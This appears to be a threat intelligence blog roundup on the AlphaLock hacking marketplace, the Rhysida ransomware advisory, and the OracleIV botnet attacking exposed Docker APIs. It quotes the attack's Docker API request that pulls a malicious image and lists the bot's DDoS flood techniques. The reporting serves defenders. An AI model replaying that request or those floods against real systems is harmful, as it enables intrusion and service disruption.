CTI Roundup: AlphaLock, a New Russian Hacking Group is Discovered

First up in this week’s roundup CTI investigates AlphaLock, a Russian group that trains hackers and monetizes their services through a dedicated affiliate program. Next CTI explores a recent joint advisory on Rhysida, an emerging ransomware that is now threatening multiple sectors. CTI wraps up with an overview of a new campaign targeting publicly exposed instances of the Docker Engine API.

1. AlphaLock trains hackers, monetizes their services

Researchers have discovered a new Russian hacking group called AlphaLock that runs a pen-testing training organization. The group was discovered on a public Telegram channel that’s now private.

AlphaLock trains hackers through customized online courses. It also monetizes its services through a dedicated affiliate program — creating an end-to-end marketplace for cybercrime.

Its business model consists of two parts, including Bazooka Code pentest training and the ALPentest hacking marketplace:

1. Bazooka Code: The first part of their business model involves training. Here they provide hackers with customized online training courses called Bazooka Code. AlphaLock tries to avoid presenting itself as a threat actor or cybercriminal. Instead, the group claims they are simply training pen testers.
2. The ALPentest Hacking Marketplace: The second part of AlphaLock’s business model involves the dark web forum XSS and an affiliate program where they likely plan to make most of their money. Their plan is to use newly trained hackers, or pen testers, to create a marketplace where threat actors can purchase testing services targeted at a specific organization.

Beta versions of the new marketplace revealed that threat actors would be able to list targets that they would like to pen test. Other threat actors could then attack that target, post proof, and collect the money.

The platform apparently attracted too much attention, forcing the threat actor to post a long message noting that the entire program will be moving to a new decentralized chat application known as Matrix.

Analyst comments from Tanium’s Cyber Threat Intelligence team

AlphaLock is working hard to create a brand for itself, with an entire custom online training course and marketplace. Interestingly, the group focuses more on operating like a business rather than focusing purely on technical sophistication.

As Flare points out on Bleeping Computer, this ties into the current trend of diversification and role specialization that’s taking place in cybercrime. Detailed and complex supply chains now exist that offer economies of scale for cybercriminals.

2. New joint advisory issued for Rhysida ransomware

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) have released a joint cybersecurity advisory to disseminate the latest activity associated with Rhysida ransomware.

Rhysida is an emerging ransomware that primarily targets the education, healthcare, manufacturing, information technology, and government sectors.

Rhysida initial access

The Rhysida ransomware actor leverages externally facing remote services like virtual private networks (VPNs) for initial access and persistence. It often attempts to authenticate to internal VPN access points with compromised but valid credentials. This is often due to a lack of multifactor authentication.

The actor has been observed executing phishing campaigns and exploiting CVE-2020-1472 which is a critical elevation of privileges vulnerability within Microsoft’s Netlogon remote protocol.

Living off the land

Like many threat actors, Rhysida leverages living-off-the-land techniques in its attacks. This includes creating Remote Desktop Protocol (RDP) connections for lateral movement, establishing VPN access, and using PowerShell. The actor commonly uses ipconfig, whoami, nltest, and various net commands to enumerate environments and gather information.

Rhysida’s tools

Rhysida uses several legitimate, publicly available tools in its attacks. This makes it more difficult for defenders to detect malicious activity.

Some examples include:

• Cmd.exe: the native command line prompt utility.
• PowerShell.exe: a native command line tool for running a Windows PowerShell session in a Command Prompt window.
• PsExec.exe: a tool in the PsTools suite for executing processes remotely.

Some additional tools include mstsc.exe, PuTTy.exe, and PortStarter, among others.

Execution

In one Rhysida ransomware attack, the actor created two folders in the C:\ drive called “in” and “out.” These folders served as a staging directory and hosted malicious executables:

1. The in folder had file names that matched host names on the victim’s network that are believed to have been imported via a scanning tool.
2. The out folder had various malicious files that were deployed to aid network-wide encryption.

Data extortion

Like most ransomware actors today, Rhysida engages in double extortion attacks by first demanding payment to decrypt data and then threatening to publish the data if the victim doesn’t pay.

The group will drop its ransom note as a PDF file named “CriticalBreachDetected” which instructs the victim to contact the group through a Tor-based portal.

Analyst comments from Tanium’s Cyber Threat Intelligence team

“Rhysida ransomware has only been around for a few months but has already claimed about 50 victims.

The group relies heavily on legitimate tools throughout multiple stages of the attack which likely enables them to remain undetected in an environment for longer.

Rhysida’s actors have also been identified operating as part of a RaaS capacity, making it possible that additional Rhysida affiliates may be seen in the future.”

3. OracleIV targets public Docker Engine APIs

Researchers at Cado Security have discovered a new campaign targeting publicly exposed instances of the Docker Engine API.

Threat actors have been seen exploiting a misconfiguration to deliver a malicious Docker container. The malware acts as a DDoS bot agent that can carry out various DoS attacks.

OracleIV initial access

Like many similar attacks, initial access began with an HTTP POST request to the /images/create endpoint of Docker’s API.

This action runs a docker pull command on the host to retrieve the specified image from Dockerhub. This is followed by another container start command that is used to spawn a container from the pulled image.

The command used here was:
POST /v1.43/images/create?tag=latest&fromImage=robbertignacio328832/oracleiv_latest

Malicious Dockerhub image

The command in this attack retrieved an image named oracleiv_latest which was uploaded to Dockerhub by the user robbertignacio328832.

The image had over 3,000 pulls when Cado Security discovered it and appears to be regularly updated. The latest changes were pushed only three days before their report was published.

Cado Security looked at the image layers to reveal the commands used by the threat actor to retrieve the malicious payload, oracle.sh, and bake it into the resulting image. The image included additional wget commands to retrieve a copy of XMRig and an associated miner configuration file.

Researchers did not observe any mining performed by this malicious container, but the inclusion of these files in the image would make this a possibility in the future.

Static analysis

Researchers focused on analyzing the oracle.sh executable embedded in the malicious container. Static analysis of this executable revealed a 64-bit, statically linked ELF with debug information intact.

They determined that the malware was written in Python and compiled with Cython. The code itself is concise and primarily dedicated to the different DoS methods.

Dynamic analysis

The bot connects back to a C2 server on port 40320 before performing primitive authentication where the bot supplies the C2 with basic info about the environment and a hardcoded password.

After successful authentication, the C2 will continuously send “routine ping, greetz Oracle IV.” Researchers have observed the botnet being used to DDoS many targets, with a preference of UDP-based flood and SSL-based flood. They were able to trick the botnet agent into connecting to their mimic C2 server to issue commands and observe its activities.

The botnet has the following DDoS capabilities:

• UDP: The botnet performs a UDP flood with 40k byte packets. This will exceed the threshold and become fragmented, creating additional computational overhead.
• UDP_PPS: This capability currently seems non-functional.
• SSL: The SSL capability opens a TCP connection, sends a large amount of data, and then closes before repeating the process.
• SYN: This capability is identical to SSL.
• HTTPGET: This capability is also non-functional.
• SLOW: This is a slowloris-style attack in which the agent opens several connections to the server and repeatedly sends small amounts of data to keep the connection open.
• FIVE: A UDP flood with 18-byte packets, likely part of the FiveM server protocol.
• VSE: A UDP flood with 20-byte packets.
• OVH: A UDP flood with 8-byte packets designed to circumvent OVH’s DDoS protection.

Analyst comments from Tanium’s Cyber Threat Intelligence team

This attack proves that threat actors are still interested in leveraging misconfigured internet-facing services as a means of initial access and will likely continue to do so.

Cado Security sums up this threat quite well:

The portability that containerization brings allows malicious payloads to be executed in a deterministic manner across Docker hosts, regardless of the configuration of the host itself. Whilst OracleIV is not technically a supply chain attack, users of Dockerhub should be aware that malicious container images do indeed exist in Docker’s image library.

---

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.